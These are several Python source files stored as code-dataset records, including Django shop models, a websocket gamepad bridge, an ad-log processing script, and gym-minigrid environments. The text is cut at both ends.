return self.attribute.name\n\n def save(self, *args, **kwargs):\n if self.attribute.value_type == 'options':\n self.text_value = None\n elif self.attribute.value_type == 'text':\n self.option = None\n super(ProductAttributeValue, self).save(*args, **kwargs)\n\n def get_value(self):\n if self.attribute.value_type == 'options':\n return self.option.value\n elif self.attribute.value_type == 'text':\n return self.text_value\n\n\nclass DeliveryMethod(models.Model):\n title = models.CharField(\n _('title'), max_length=255, default='', blank=True\n )\n published = models.BooleanField(_('published'), default=True)\n order = models.PositiveSmallIntegerField(_('order'), default=0)\n price = models.DecimalField(\n _('price'), max_digits=14, decimal_places=2,\n validators=[MinValueValidator(Decimal(0))]\n )\n involves_shipping = models.BooleanField(\n _('involves shipping'), default=True\n )\n\n class Meta:\n app_label = 'shop'\n ordering = ('order',)\n verbose_name = _('delivery method')\n verbose_name_plural = _('delivery methods')\n\n def __str__(self):\n return self.title\n\n def get_payment_methods(self):\n return self.payment_methods.filter(published=True)\n\n def as_dict(self):\n data = {\n 'pk': self.pk,\n 'title': self.title,\n 'price': float(self.price),\n 'involves_shipping': self.involves_shipping,\n 'payment_methods': [\n p.as_dict() for p in self.get_payment_methods()\n ]\n }\n return data\n\n\nclass PaymentMethod(models.Model):\n title = models.CharField(\n _('title'), max_length=255, default='', blank=True\n )\n published = models.BooleanField(_('published'), default=True)\n order = models.PositiveSmallIntegerField(_('shop order'), default=0)\n price = models.DecimalField(\n _('price'), max_digits=14, decimal_places=2,\n validators=[MinValueValidator(Decimal(0))]\n )\n delivery_methods = models.ManyToManyField(\n DeliveryMethod, verbose_name=_('delivery methods'),\n related_name='payment_methods'\n )\n gateway = models.CharField(\n _('gateway'), max_length=255,\n choices=PAYMENT_GATEWAYS_CHOICES, null=True, blank=True\n )\n wait_for_payment = models.BooleanField(_('wait for payment'), default=True)\n\n class Meta:\n app_label = 'shop'\n ordering = ('order',)\n verbose_name = _('payment method')\n verbose_name_plural = _('payment methods')\n\n def __str__(self):\n return self.title\n\n def get_shipment_methods(self):\n return self.shipment_methods.filter(published=True)\n\n def as_dict(self):\n data = {\n 'pk': self.pk,\n 'title': self.title,\n 'price': float(self.price),\n 'gateway': self.gateway\n }\n return data\n\n def get_gateway_api_url(self):\n try:\n return shop_settings.SHOP_PAYMENT_GATEWAYS[self.gateway]['api_url']\n except AttributeError:\n return None\n\n\nclass Customer(models.Model):\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL, verbose_name=_('user')\n )\n\n wishlist = models.ManyToManyField(\n Product, verbose_name=_('wishlist'), related_name='wishlists'\n )\n\n class Meta:\n app_label = 'shop'\n verbose_name = _('customer')\n verbose_name_plural = _('customers')\n\n def __str__(self):\n return self.user.username\n\n def get_wishlist(self):\n return self.wishlist.filter(\n published=True,\n category__published=True\n )\n\n def get_orders(self):\n return self.orders.all()\n\n\n@receiver(post_save, sender=settings.AUTH_USER_MODEL)\ndef create_user_hook(sender, instance, created, **kwargs):\n if created:\n Customer.objects.get_or_create(user=instance)\n\n\n@receiver(post_delete, sender=Customer)\ndef delete_user_hook(sender, instance, **kwargs):\n instance.user.delete()\n\n\nclass ShopOrder(models.Model):\n order_id = models.UUIDField(\n _('order id'), default=uuid.uuid4, editable=False\n )\n created = models.DateTimeField(\n _('creation date'), auto_now_add=True\n )\n customer = models.ForeignKey(\n Customer, verbose_name=_('customer'), related_name='orders'\n )\n delivery_method = models.ForeignKey(\n DeliveryMethod, verbose_name=_('delivery method')\n )\n payment_method = models.ForeignKey(\n PaymentMethod, verbose_name=_('payment method')\n )\n delivery_address = models.TextField(\n _('delivery address'), default='', blank=True\n )\n invoice_tax_id = models.CharField(\n _('invoice - tax ID'), max_length=255, blank=True, default=''\n )\n invoice_company = models.TextField(\n _('invoice - company name and address'),\n blank=True, default=''\n )\n additional_info = models.TextField(\n _('additional info'), default='', blank=True\n )\n\n status = models.CharField(\n _('status'), max_length=255,\n choices=shop_settings.SHOP_ORDER_STATUSES,\n )\n\n class Meta:\n app_label = 'shop'\n ordering = ('-created',)\n verbose_name = _('shop order')\n verbose_name_plural = _('shop orders')\n\n def __str__(self):\n return str(self.order_id)\n\n def get_products(self):\n return self.products.all()\n\n def get_prices(self):\n products = self.get_products().aggregate(\n total=Sum(\n F('gross_price') * F('quantity'),\n output_field=models.DecimalField()\n )\n )\n delivery_price = self.delivery_method.price\n payment_price = self.payment_method.price\n total = (products['total'] or Decimal(0) +\n delivery_price +\n payment_price)\n return {\n 'products': products['total'],\n 'delivery': delivery_price,\n 'payment': payment_price,\n 'total': total\n }\n\n @property\n def invoice(self):\n return bool(self.invoice_tax_id or self.invoice_company)\n\n\nclass ShopOrderProduct(models.Model):\n shop_order = models.ForeignKey(\n ShopOrder, verbose_name=_('shop order'), related_name='products'\n )\n product = models.ForeignKey(Product, verbose_name=_('product'))\n net_price = models.DecimalField(\n _('net price'), max_digits=14, decimal_places=2,\n validators=[MinValueValidator(Decimal(0))]\n )\n tax_rate = models.ForeignKey(\n TaxRate, verbose_name=_('tax rate'), null=True, blank=True\n )\n gross_price = models.DecimalField(\n _('gross price'), max_digits=14, decimal_places=2,\n validators=[MinValueValidator(Decimal(0))]\n )\n quantity = models.PositiveIntegerField(_('quantity'))\n\n class Meta:\n app_label = 'shop'\n verbose_name = _('product')\n verbose_name_plural = _('products')\n\n def __str__(self):\n return self.product.title\n\n def get_subtotal(self):\n return self.gross_price * self.quantity\n\n\nclass ShopOrderPayment(PolymorphicModel):\n shop_order = models.ForeignKey(\n ShopOrder, verbose_name=_('shop order'), related_name='payments'\n )\n\n class Meta:\n app_label = 'shop'\n verbose_name = _('payment')\n verbose_name_plural = _('payments')\n\n\nclass GenericPayment(ShopOrderPayment):\n amount = models.DecimalField(\n _('amount'), max_digits=14, decimal_places=2,\n validators=[MinValueValidator(Decimal(0))]\n )\n date = models.DateTimeField(_('date'))\n\n class Meta:\n app_label = 'shop'\n verbose_name = _('payment')\n verbose_name_plural = _('payments')\n\n def get_amount(self):\n return self.amount\n\n def get_date(self):\n return self.date\n","sub_path":"shop/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":17413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"465671458","text":"import asyncio\nimport websockets\nimport serial\nimport time\nfrom pathlib import Path\n\nTIME_FORMAT = \"[%Y-%m-%d %H:%M:%S]\"\n\nclass WSServer:\n def __init__(self, queue, base_port):\n self.message_queue = queue\n self.base_port = base_port\n\n async def on_receive(self, websocket, path):\n server_port = websocket.local_address[1]\n try:\n async for message in websocket:\n print(time.strftime(TIME_FORMAT), server_port, \"received from\", websocket.remote_address[0], \"0x\" + message.hex())\n\n # Append the received message to the queue\n await self.message_queue.put((server_port, message))\n\n await websocket.send(message)\n except Exception as e:\n print(time.strftime(TIME_FORMAT), server_port, \"Unexpected connection close\", )\n print(time.strftime(TIME_FORMAT), server_port, \"Issuing disconnect\", )\n await self.message_queue.put((server_port, (server_port - self.base_port).to_bytes(1, 'little') + b\"\\x01\\x00\\x00\"))\n\n def start(self, num_controllers):\n for i in range(num_controllers):\n print(time.strftime(TIME_FORMAT), \"Starting server on port\", i + self.base_port)\n asyncio.get_event_loop().run_until_complete(websockets.serve(self.on_receive, \"\", i + self.base_port))\n print(time.strftime(TIME_FORMAT), \"Server started\")\n\n# Consumes arriving messages queue. This serializes message handling independent\n# of the server threads, to avoid races over the serial output\nasync def queue_handler(queue, serial_port, baud=115200):\n print(time.strftime(TIME_FORMAT), \"queue_handler started\")\n with serial.Serial(serial_port, 115200, timeout=1) as ser:\n while True:\n index, message = await queue.get()\n # print(\"Dequeued message\", message, \"for index\", index)\n ser.write(message)\n queue.task_done()\n\nasync def dummy_queue_handler(queue):\n print(time.strftime(TIME_FORMAT), \"queue_handler started\")\n while True:\n index, message = await queue.get()\n print(time.strftime(TIME_FORMAT), \"Dequeued message\", \"0x\" + message.hex(), \"for index\", index)\n queue.task_done()\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser(description='Run server for Remote USB Gamepad bridge')\n parser.add_argument('--num-controllers', type=int, default=2, help='Number of controllers to listen for')\n parser.add_argument('--base-port', '-p', type=int, default=8000, help='Base port number for 0th controller. Other controllers will have servers attached to port base+id')\n parser.add_argument('--baud', type=int, default=115200, help='Serial port baud rate')\n parser.add_argument('--dummy-serial', action=\"store_true\", help='Use dummy handler instead of real serial port')\n parser.add_argument('serial_port', help=\"Serial port to output commands\")\n\n args = parser.parse_args()\n\n queue = asyncio.Queue()\n \n server = WSServer(queue, args.base_port)\n server.start(args.num_controllers)\n\n if args.dummy_serial:\n asyncio.get_event_loop().run_until_complete(dummy_queue_handler(queue))\n else:\n asyncio.get_event_loop().run_until_complete(queue_handler(queue, args.serial_port, args.baud))\n asyncio.get_event_loop().run_forever()\n","sub_path":"server/gamepad_bridge_server.py","file_name":"gamepad_bridge_server.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"636634538","text":"# -*- coding: utf-8 -*-\r\n\r\nimport pandas as pd\r\n \r\n \r\n# 需要读取广告操作数据集中的广告ID并将其转化成list\r\nAd_operation = pd.read_csv('/cos_person/tencent/train/Ad_Operation_Data.csv')\r\nAd_op_id = Ad_operation['ad_id'].drop_duplicates(keep='first', inplace=False)\r\nlist_Ad_op_id = list(Ad_op_id)\r\n\r\nuser_feature = pd.read_csv('/cos_person/tencent/train/userFeature.csv')\r\nuser_id = user_feature['user_id'].drop_duplicates(keep='first', inplace=False)\r\nlist_user_id = list(user_id)\r\n \r\n# 定义曝光日志中的相关列\r\nExposure_Log_Data = []\r\n\r\nfor j in range(10,23):\r\n with open('/cos_public/cephfs/tesla_common/deeplearning/dataset/AI_Race/track_log/track_log_201904' + str(j) + '.out', 'r') as f:\r\n for i, line in enumerate(f):\r\n line = line.strip().split('\\t')\r\n \r\n flag_line = line\r\n \r\n if (i % 5000000) == 0:\r\n print(\"*******run \", i)\r\n \r\n if line[0] == '0' or line[1] == '0' or line[2] == '0' or line[3] == '0' or line[4] == '0':\r\n continue\r\n \r\n if ',' in line[2]:\r\n continue\r\n \r\n tmp_user_id = int(line[2]) ##不在用户特征集中的曝光\r\n if tmp_user_id not in list_user_id:\r\n continue\r\n \r\n if '.' in line[0]:\r\n continue\r\n if '.' in line[3]:\r\n continue\r\n \r\n ad_list = []\r\n ad_list_columns = ['ad_id', 'bid', 'pctr', 'quality_ecpm', 'totalEcpm', \r\n 'filter', 'label']\r\n ad_list.append(ad_list_columns)\r\n \r\n tmp_line = line[4].strip().split(';')\r\n \r\n for each in tmp_line:\r\n save_line = []\r\n each_list = each.split(',')\r\n if each_list[6] != '1':\r\n continue\r\n else:\r\n if int(each_list[0]) not in list_Ad_op_id:\r\n continue;\r\n else: \r\n line.append(int(each_list[0]))\r\n line.append(int(each_list[1]))\r\n line.append(float(each_list[2]))\r\n line.append(float(each_list[3]))\r\n line.append(float(each_list[4]))\r\n line.append(int(each_list[5]))\r\n line.append(int(each_list[6]))\r\n save_line.append(line[5])\r\n if save_line:\r\n Exposure_Log_Data.append(line)\r\n line = flag_line\r\n \r\nExposure_Log_Data = pd.DataFrame(Exposure_Log_Data) \r\nExposure_Log_Data_columns = ['Ad_Request_id', 'Ad_Request_Time','user_id',\r\n 'Ad_pos_id', 'ad_list',\r\n 'ad_id','ad_bid','pctr',\r\n 'quality_ecpm', 'totalEcpm',\r\n 'filter', 'label']\r\nExposure_Log_Data.columns = Exposure_Log_Data_columns \r\nExposure_Log_Data.to_csv('/cos_person/tencent/train/Total_Exposure_Log_Data_with_AD_list.csv', index=False,header=None)\r\n\r\nExposure_Log_Data.drop(Exposure_Log_Data.columns[['ad_list']], axis=1,inplace=True)\r\nExposure_Log_Data.to_csv('/cos_person/tencent/train/Train_Log_Data.csv', index=False,header=None)","sub_path":"(修改)处理曝光文件.py","file_name":"(修改)处理曝光文件.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"511286154","text":"\nclass ECSystemParameters:\n \"\"\"\n This class governs all the parameters needed to run our EC System.\n Initially set to invalid values to prevent system for running.\n\n Generation size => How many Individuals do we want in each generation?\n Genome size => We can cap the length for how long we want our initial\n population's expressions to be\n X-Training Data => The x value we will plug into our random expressions\n Y-Training Data => The y values we will match our output to to determine fitness\n Fitness Threshold => What percentage of the population will be selected to\n go on to the next generation\n Stagnation Threshold => If our fitness is not improving overall over this set\n number of generations, we reboot the system and start over\n Mutation Percentage => Of the Individuals selected for the next generation, what\n percentage will we mutate instead of crossover\n Success Threshold => Determines when we have found an equivalent expression. Their\n fitness is at or below this value.\n \"\"\"\n\n def __init__(self):\n self.generation_size = 0\n self.genome_size = 0\n self.x_training_data = []\n self.y_training_data = []\n self.fitness_threshold = -1.0\n self.stagnation_threshold = -1\n self.mutation_percentage = -1.0\n self.success_threshold = -1.0\n\n def all_parameters_set(self):\n \"\"\"\n Make sure that all values are appropriately set\n :return: Boolean true if system is ready, false otherwise\n \"\"\"\n return self.generation_size > 49 and self.genome_size > 4 and self._valid_training_data() \\\n and self.fitness_threshold > 0.0 and self.stagnation_threshold > 0 \\\n and self.mutation_percentage >= 0.0 and self.success_threshold >= 0.0\n\n def _valid_training_data(self):\n \"\"\"\n Make sure our training data exists and that we have a x for every y\n :return: Boolean true if valid data, false othewise\n \"\"\"\n return len(self.x_training_data) > 0 and len(self.x_training_data) == len(self.y_training_data)\n","sub_path":"src/ecSystem/ECSystemParameters.py","file_name":"ECSystemParameters.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"119699365","text":"def pokerChips2(chips):\n memory = {}\n total = len(chips)\n return count_poker_moves(chips, 0, sum(chips) / len(chips), total, memory)\n\ndef count_poker_moves(chips, moves, average, total, memory):\n str_value = ''\n max_value = max(chips)\n position = chips.index(max_value)\n new_chips = chips[position:position+1] + chips[position+1:] + chips[:position]\n\n for value in map(lambda x: str(x), new_chips):\n str_value += value + ','\n\n if str_value in memory:\n return memory[str_value]\n\n if max_value == average or moves == total:\n return moves\n\n new_array = new_chips[1:]\n new_array2 = new_array[:]\n new_array[0] += max_value - average\n new_array2[len(new_array2)-1] += max_value - average\n count1 = count_poker_moves(new_array, moves, average, total, memory)\n count2 = count_poker_moves(new_array2, moves, average, total, memory)\n\n if count1 < count2:\n total_moves = moves + count1 + 1\n else:\n total_moves = moves + count2 + 1\n memory[str_value] = total_moves\n return total_moves\n\nprint(pokerChips2([18, 22, 30, 21, 2, 20, 22, 8, 30, 30, 7, 23, 1, 22, 8, 23, 7, 22, 25, 26, 17, 30, 27, 6, 25, 29, 20, 9, 3, 25, 16, 16, 30, 30, 8, 15, 27, 25, 6, 22, 16, 10, 24, 14, 26, 0, 13, 28, 11, 5]))\n","sub_path":"old/poker_chips2b.py","file_name":"poker_chips2b.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"526592022","text":"import sys, itertools, operator, inspect\nimport numpy as np\nimport gym\n\nfrom gym_minigrid.minigrid import Grid, MiniGridEnv\nfrom gym_minigrid.roomgrid import RoomGrid\nimport gym_minigrid.entities as entities\nfrom gym_minigrid.entities import Goal, Wall, Door, Key, Ball, Box, Lava, COLORS, OBJECTS\n\n\nclass Empty(MiniGridEnv):\n \"\"\"\n This environment is an empty room, and the goal of the agent is to reach the green goal square, which provides a sparse reward. A small penalty is subtracted for the number of steps to reach the goal. This environment is useful, with small rooms, to validate that your RL algorithm works correctly, and with large rooms to experiment with sparse rewards and exploration. The random variants of the environment have the agent starting at a random position for each episode, while the regular variants have the agent always starting in the corner opposite to the goal.\n \"\"\"\n\n def __init__(\n self,\n size=8,\n agent_start_pos=(1,1),\n agent_start_state='right',\n max_steps=None,\n **kwargs\n ):\n self.agent_start_pos = agent_start_pos\n self.agent_start_state = agent_start_state\n\n super().__init__(\n height=size,\n width=size,\n max_steps=4 * size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n # Create an empty grid\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.wall_rect(0, 0, height, width)\n\n # Place a goal square in the bottom-right corner\n self[height - 2, width - 2] = Goal()\n\n # Place the agent\n self.agent.pos = self.agent_start_pos\n self.agent.state = self.agent_start_state\n\n self.mission = 'get to the green goal square'\n\n\nclass FourRooms(MiniGridEnv):\n \"\"\"\n Classic four room reinforcement learning environment. The agent must navigate in a maze composed of four rooms interconnected by 4 gaps in the walls. To obtain a reward, the agent must reach the green goal square. Both the agent and the goal square are randomly placed in any of the four rooms.\n \"\"\"\n\n def __init__(self, agent_pos=None, goal_pos=None, max_steps=None, **kwargs):\n self._agent_default_pos = agent_pos\n self._goal_default_pos = goal_pos\n super().__init__(\n height=19, \n width=19, \n max_steps=100 if max_steps is None else max_steps, \n **kwargs)\n\n def _gen_grid(self, height, width):\n # Create the grid\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.horz_wall(0, 0)\n self.horz_wall(height - 1, 0)\n self.vert_wall(0, 0)\n self.vert_wall(0, width - 1)\n\n room_w = width // 2\n room_h = height // 2\n\n # For each row of rooms\n for i in range(0, 2):\n\n # For each column\n for j in range(0, 2):\n i_top = i * room_h\n j_left = j * room_w\n i_bottom = i_top + room_h\n j_right = j_left + room_w\n\n # Right wall and door\n if j + 1 < 2:\n self.vert_wall(i_top, j_right, room_h)\n pos = (self.rng.randint(i_top + 1, i_bottom), j_right)\n self[pos].clear()\n\n # Bottom wall and door\n if i + 1 < 2:\n self.horz_wall(i_bottom, j_left, room_w)\n pos = (i_bottom, self.rng.randint(j_left + 1, j_right))\n self[pos].clear()\n\n # Randomize the player start position and orientation\n if self._agent_default_pos is not None:\n self.agent.pos = self._agent_default_pos\n self.agent.state = self.rng.choice(self.agent.STATES) # assuming random start direction\n else:\n self.place_agent()\n\n if self._goal_default_pos is not None:\n self[self._goal_default_pos] = Goal()\n else:\n self.place_obj(Goal())\n\n self.mission = 'Reach the goal'\n\n\nclass DoorKey(MiniGridEnv):\n \"\"\"\n This environment has a key that the agent must pick up in order to unlock a goal and then get to the green goal square. This environment is difficult, because of the sparse reward, to solve using classical RL algorithms. It is useful to experiment with curiosity or curriculum learning.\n \"\"\"\n\n def __init__(self, size=8, max_steps=None, **kwargs):\n super().__init__(\n height=size,\n width=size,\n max_steps=10 * size * size if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n # Create an empty grid\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.wall_rect(0, 0, height, width)\n\n # Place a goal in the bottom-right corner\n self[height - 2, width - 2] = Goal()\n\n # Create a vertical splitting wall\n split_idx = self.rng.randint(2, width - 2)\n self.vert_wall(0, split_idx)\n\n # Place the agent at a random position and orientation\n # on the left side of the splitting wall\n self.place_agent(size=(height, split_idx))\n\n # Place a door in the wall\n door_idx = self.rng.randint(1, height - 2)\n self[door_idx, split_idx] = Door('yellow', state='locked')\n\n # Place a yellow key on the left side\n self.place_obj(Key('yellow'), top=(0, 0), size=(height, split_idx))\n\n self.mission = 'use the key to open the door and then get to the goal'\n\n\nclass _MultiRoom(object):\n\n def __init__(self,\n top,\n size,\n entry_door_pos,\n exit_door_pos\n ):\n self.top = top\n self.size = size\n self.entry_door_pos = entry_door_pos\n self.exit_door_pos = exit_door_pos\n\n\nclass MultiRoom(MiniGridEnv):\n \"\"\"\n This environment has a series of connected rooms with doors that must be opened in order to get to the next room. The final room has the green goal square the agent must get to. This environment is extremely difficult to solve using RL alone. However, by gradually increasing the number of rooms and building a curriculum, the environment can be solved.\n \"\"\"\n\n def __init__(self,\n min_num_rooms=6,\n max_num_rooms=6,\n max_room_size=10,\n max_steps=None,\n **kwargs\n ):\n assert min_num_rooms > 0\n assert max_num_rooms >= min_num_rooms\n assert max_room_size >= 4\n\n self.min_num_rooms = min_num_rooms\n self.max_num_rooms = max_num_rooms\n self.max_room_size = max_room_size\n\n self.rooms = []\n\n super().__init__(\n height=25,\n width=25,\n max_steps=self.max_num_rooms * 20 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n room_list = []\n\n # Choose a random number of rooms to generate\n num_rooms = self.rng.randint(self.min_num_rooms, self.max_num_rooms + 1)\n\n while len(room_list) < num_rooms:\n cur_room_list = []\n\n entry_door_pos = (\n self.rng.randint(0, height - 2),\n self.rng.randint(0, width - 2)\n )\n\n # Recursively place the rooms\n self._place_room(\n num_rooms,\n room_list=cur_room_list,\n min_sz=4,\n max_sz=self.max_room_size,\n entry_door_wall=2,\n entry_door_pos=entry_door_pos\n )\n\n if len(cur_room_list) > len(room_list):\n room_list = cur_room_list\n\n # Store the list of rooms in this environment\n assert len(room_list) > 0\n self.rooms = room_list\n\n # Create the grid\n self.grid = Grid(height, width)\n\n prev_door_color = None\n\n # For each room\n for idx, room in enumerate(room_list):\n\n top_i, top_j = room.top\n room_height, room_width = room.size\n\n # Generate the surrounding walls\n self.horz_wall(top_i, top_j, width=room_width)\n self.horz_wall(top_i + room_height - 1, top_j, width=room_width)\n self.vert_wall(top_i, top_j, height=room_height)\n self.vert_wall(top_i, top_j + room_width - 1, height=room_height)\n\n # If this isn't the first room, place the entry door\n if idx > 0:\n # Pick a door color different from the previous one\n door_colors = set(COLORS)\n if prev_door_color:\n door_colors.remove(prev_door_color)\n # Note: the use of sorting here guarantees determinism,\n # This is needed because Python's set is not deterministic\n door_colors = self.rng.choice(sorted(door_colors))\n\n self[room.entry_door_pos] = Door(door_colors)\n prev_door_color = door_colors\n\n prev_room = room_list[idx - 1]\n prev_room.exit_door_pos = room.entry_door_pos\n\n # Randomize the starting agent position and direction\n self.place_agent(room_list[0].top, room_list[0].size)\n\n # Place the final goal in the last room\n self.goal_pos = self.place_obj(Goal(), room_list[-1].top, room_list[-1].size)\n\n self.mission = 'traverse the rooms to get to the goal'\n\n def _place_room(\n self,\n num_left,\n room_list,\n min_sz,\n max_sz,\n entry_door_wall,\n entry_door_pos\n ):\n # Choose the room size randomly\n size_i = self.rng.randint(min_sz, max_sz + 1)\n size_j = self.rng.randint(min_sz, max_sz + 1)\n\n # The first room will be at the door position\n if len(room_list) == 0:\n top_i, top_j = entry_door_pos\n # Entry on the right\n elif entry_door_wall == 0:\n i = entry_door_pos[0]\n top_i = self.rng.randint(i - size_i + 2, i)\n top_j = entry_door_pos[1] - size_j + 1\n # Entry wall on the bottom\n elif entry_door_wall == 1:\n top_i = entry_door_pos[0] - size_i + 1\n j = entry_door_pos[1]\n top_j = self.rng.randint(j - size_j + 2, j)\n # Entry wall on the left\n elif entry_door_wall == 2:\n i = entry_door_pos[0]\n top_i = self.rng.randint(i - size_i + 2, i)\n top_j = entry_door_pos[1]\n # Entry wall on the top\n elif entry_door_wall == 3:\n top_i = entry_door_pos[0]\n j = entry_door_pos[1]\n top_j = self.rng.randint(j - size_j + 2, j)\n else:\n raise ValueError(f'Entry door wall index wrong: {entry_door_wall}')\n\n # If the room is out of the grid, can't place a room here\n if top_i < 0 or top_j < 0:\n return False\n if top_i + size_i >= self.height or top_j + size_j > self.width:\n return False\n\n # If the room intersects with previous rooms, can't place it here\n for room in room_list[:-1]:\n non_overlap = \\\n top_i + size_i < room.top[0] or \\\n room.top[0] + room.size[0] <= top_i or \\\n top_j + size_j < room.top[1] or \\\n room.top[1] + room.size[1] <= top_j\n\n if not non_overlap:\n return False\n\n # Add this room to the list\n room_list.append(_MultiRoom(\n (top_i, top_j),\n (size_i, size_j),\n entry_door_pos,\n None\n ))\n\n # If this was the last room, stop\n if num_left == 1:\n return True\n\n # Try placing the next room\n for i in range(0, 8):\n\n # Pick which wall to place the out door on\n wall_set = set((0, 1, 2, 3))\n wall_set.remove(entry_door_wall)\n exit_door_wall = self.rng.choice(sorted(wall_set))\n next_entry_wall = (exit_door_wall + 2) % 4\n\n # Pick the exit door position\n # Exit on right wall\n if exit_door_wall == 0:\n exit_door_pos = (\n top_i + self.rng.randint(1, size_i - 1),\n top_j + size_j - 1\n )\n # Exit on bottom wall\n elif exit_door_wall == 1:\n exit_door_pos = (\n top_i + size_i - 1,\n top_j + self.rng.randint(1, size_j - 1)\n )\n # Exit on left wall\n elif exit_door_wall == 2:\n exit_door_pos = (\n top_i + self.rng.randint(1, size_i - 1),\n top_j\n )\n # Exit on top wall\n elif exit_door_wall == 3:\n exit_door_pos = (\n top_i,\n top_j + self.rng.randint(1, size_j - 1)\n )\n else:\n raise ValueError\n\n # Recursively create the other rooms\n success = self._place_room(\n num_left - 1,\n room_list=room_list,\n min_sz=min_sz,\n max_sz=max_sz,\n entry_door_wall=next_entry_wall,\n entry_door_pos=exit_door_pos\n )\n\n if success:\n break\n\n return True\n\n\nclass Fetch(MiniGridEnv):\n \"\"\"\n This environment has multiple objects of assorted types and colors. The agent receives a textual string as part of its observation telling it which object to pick up. Picking up the wrong object produces a negative reward.\n \"\"\"\n\n def __init__(\n self,\n size=8,\n num_objs=3,\n max_steps=None,\n **kwargs\n ):\n self.num_objs = num_objs\n\n super().__init__(\n height=size,\n width=size,\n max_steps=5 * size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.horz_wall(0, 0)\n self.horz_wall(height - 1, 0)\n self.vert_wall(0, 0)\n self.vert_wall(0, width - 1)\n\n types = ['key', 'ball']\n\n objs = []\n\n # For each object to be generated\n while len(objs) < self.num_objs:\n obj_type = self.rng.choice(types)\n obj_color = self.rng.choice(COLORS)\n\n if obj_type == 'key':\n obj = Key(obj_color)\n elif obj_type == 'ball':\n obj = Ball(obj_color)\n\n self.place_obj(obj)\n objs.append(obj)\n\n # Randomize the player start position and orientation\n self.place_agent()\n\n # Choose a random object to be picked up\n target = objs[self.rng.randint(0, len(objs))]\n self.target_type = target.type\n self.target_color = target.color\n\n # Generate the mission string\n missions = ['get a', 'go get a', 'fetch a', 'go fetch a', 'you must fetch a']\n self.mission = self.rng.choice(missions) + f' {self.target_color} {self.target_type}'\n\n def step(self, action):\n obs, reward, done, info = super().step(action)\n\n if self.agent.is_carrying:\n if self.agent.carrying.color == self.target_color and \\\n self.agent.carrying.type == self.target_type:\n reward = self._win_reward\n else:\n reward = self._lose_reward\n done = True\n\n return obs, reward, done, info\n\n\nclass GoToObject(MiniGridEnv):\n \"\"\"\n This environment is a room with four doors, one on each wall. The agent receives a textual (mission) string as input, telling it which door to go to, (eg: \"go to the red door\"). It receives a positive reward for performing the `done` action next to the correct door, as indicated in the mission string. (BUG: doesn't look like the mission had that indicated)\n \"\"\"\n\n def __init__(self, size=6, num_objs=2, max_steps=None, **kwargs):\n self.num_objs = num_objs\n\n super().__init__(\n height=size,\n width=size,\n max_steps=5 * size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n self.grid = Grid(height, width)\n\n # Generate the surrounding walls\n self.wall_rect(0, 0, height, width)\n\n # Types and colors of objects we can generate\n types = ['key', 'ball', 'box']\n\n objs = []\n # Until we have generated all the objects\n while len(objs) < self.num_objs:\n obj_type = self.rng.choice(types)\n obj_color = self.rng.choice(COLORS)\n\n # If this object already exists, try again\n if (obj_type, obj_color) in objs:\n continue\n\n if obj_type == 'key':\n obj = Key(obj_color)\n elif obj_type == 'ball':\n obj = Ball(obj_color)\n elif obj_type == 'box':\n obj = Box(obj_color)\n\n self.place_obj(obj)\n objs.append(obj)\n\n # Randomize the agent start position and orientation\n self.place_agent()\n\n # Choose a random object to be picked up\n self.target = self.rng.choice(objs)\n\n self.mission = f'go to the {self.target.color} {self.target.type}'\n\n def step(self, action):\n obs, reward, done, info = super().step(action)\n\n # Toggle/pickup action terminates the episode\n if self.actions[action] == 'toggle':\n reward = self._lose_reward\n done = True\n\n # Reward performing the done action next to the target object\n ai, aj = self.agent.pos\n ti, tj = self.target.pos\n if self.actions[action] == 'done':\n reward = self._lose_reward\n if abs(ai - ti) <= 1 and abs(aj - tj) <= 1:\n reward = self._win_reward\n done = True\n\n return obs, reward, done, info\n\n\nclass GoToDoor(MiniGridEnv):\n \"\"\"\n This environment is a room with four doors, one on each wall. The agent receives a textual (mission) string as input, telling it which door to go to, (eg: \"go to the red door\"). It receives a positive reward for performing the `done` action next to the correct door, as indicated in the mission string.\n \"\"\"\n\n def __init__(self, size=5, max_steps=None, **kwargs):\n assert size >= 5\n\n super().__init__(\n height=size,\n width=size,\n max_steps=5 * size**2 if max_steps is None else max_steps,\n **kwargs\n )\n\n def _gen_grid(self, height, width):\n # Create the grid\n self.grid = Grid(height, width)\n\n # Randomly vary the room width and height\n height = self.rng.randint(5, height + 1)\n width = self.rng.randint(5, width + 1)\n\n # Generate the surrounding walls\n self.wall_rect(0, 0, height, width)\n\n # Generate the 4 doors at random positions\n door_pos = [(0, self.rng.randint(2, width - 2)),\n (height - 1, self.rng.randint(2, width - 2)),\n (self.rng.randint(2, height - 2), 0),\n (self.rng.randint(2, height - 2), width - 1)]\n\n # Generate the door colors\n door_colors = self.rng.choice(COLORS, size=len(door_pos), replace=False)\n\n # Place the doors in the grid\n for idx, pos in enumerate(door_pos):\n color = door_colors[idx]\n self[pos] = Door(color)\n\n # Randomize the agent start position and orientation\n self.place_agent()\n\n # Select a random target door\n door_idx = self.rng.randint(0, len(door_pos))\n self.target_pos = door_pos[door_idx]\n self.target_color = door_colors[door_idx]\n\n # Generate the mission string\n self.mission = f'go to the {self.target_color} door'\n\n def step(self, action):\n obs, reward, done, info = 